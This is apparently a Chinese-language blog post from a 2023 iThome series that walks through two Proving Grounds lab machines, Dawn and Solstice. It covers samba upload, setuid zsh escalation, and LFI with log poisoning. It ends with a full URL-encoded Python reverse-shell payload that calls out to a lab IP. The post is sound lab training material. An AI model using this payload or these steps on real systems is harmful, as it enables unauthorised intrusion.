2023 iThome 鐵人賽

DAY 25

Security

PG Play 怎麼玩都不累 - 靶機 writeup 思路分享系列第 25 篇

[Day 25] PG Play Dawn & Solstice Writeup

15th鐵人賽

jason3e7

團隊這是可以免費看的嗎

2023-10-09 19:30:28

248 瀏覽

分享至

Dawn

防雷頁

可能的遺漏

是一台有趣的靶機, 可能需要一些想像力, 需要一些推測
samba 原本的功能是什麼 ?
進入機器後, 檢查程式檔案權限

摘要

是一台有趣的靶機, 可能需要一些想像力, 需要一些推測
- 從 log 去推測出排程
samba 原本的功能是什麼 ? 有沒有什麼檔案可以上傳
透過找到有 setuid 的程式 zsh 進行提權

Walkthrough

先透過 nmap 確認開什麼 port 和什麼服務
gobuster 掃描網站目錄
手動檢查網站
手動檢查網站
手動檢查網站
手動檢查下載的 management.log, 推測可能有排程執行
enum4linux, 發現有 ITDEPT samba 資料夾
upload reverse shell script
使用 python 取得 pty shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
get local.txt
find setuid program
檢查 /etc/crontab
檢查 /etc/passwd
利用 zsh 提權, get proof.txt

ref

zsh | GTFOBins

Solstice

防雷頁

可能的遺漏

網站和服務很多, 要有耐心一個一個檢查, 注意可能有 Rabbit Hole
是一台有趣的靶機, 可能需要一些想像力, 提示比較不足
進入機器後, 檢查程序權限

摘要

網站和服務很多, 要有耐心一個一個檢查, 注意可能有 Rabbit Hole
- 本次解題沒有利用到 ftp
- 本次解題沒有利用到 smtp
是一台有趣的靶機, 可能需要一些想像力, 提示比較不足
- LFI(Local File Inclusion)
- 利用寫入 /var/log/apache2/access.log 檔案
進入機器後, 檢查程序權限, 有一個 php 是用 root 去跑的

Walkthrough

先透過 nmap 確認開什麼 port 和什麼服務
dirb 掃描網站目錄(80 port)
dirb 掃描網站目錄(8593 port)
手動檢查網站(80 port)
手動檢查網站(8593 port)
手動檢查網站(8593 port), 點擊 Book List
手動測試網站(Local File Inclusion), 成功, 發現有使用者 miguel
Local File Inclusion(/home/miguel/.bash_history), 為空
Local File Inclusion(/home/miguel/.ssh/id_rsa), 為空
Local File Inclusion(/var/log/apache2/access.log)
Local File Inclusion(/var/www/html/index.html)
利用 curl 的參數自訂 User-Agent, 嘗試寫入 /var/log/apache2/access.log
嘗試寫入 webshell, 執行成功
reverse shell

1=system(%22python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\%22192.168.45.168\%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(\%22sh\%22)%27%22);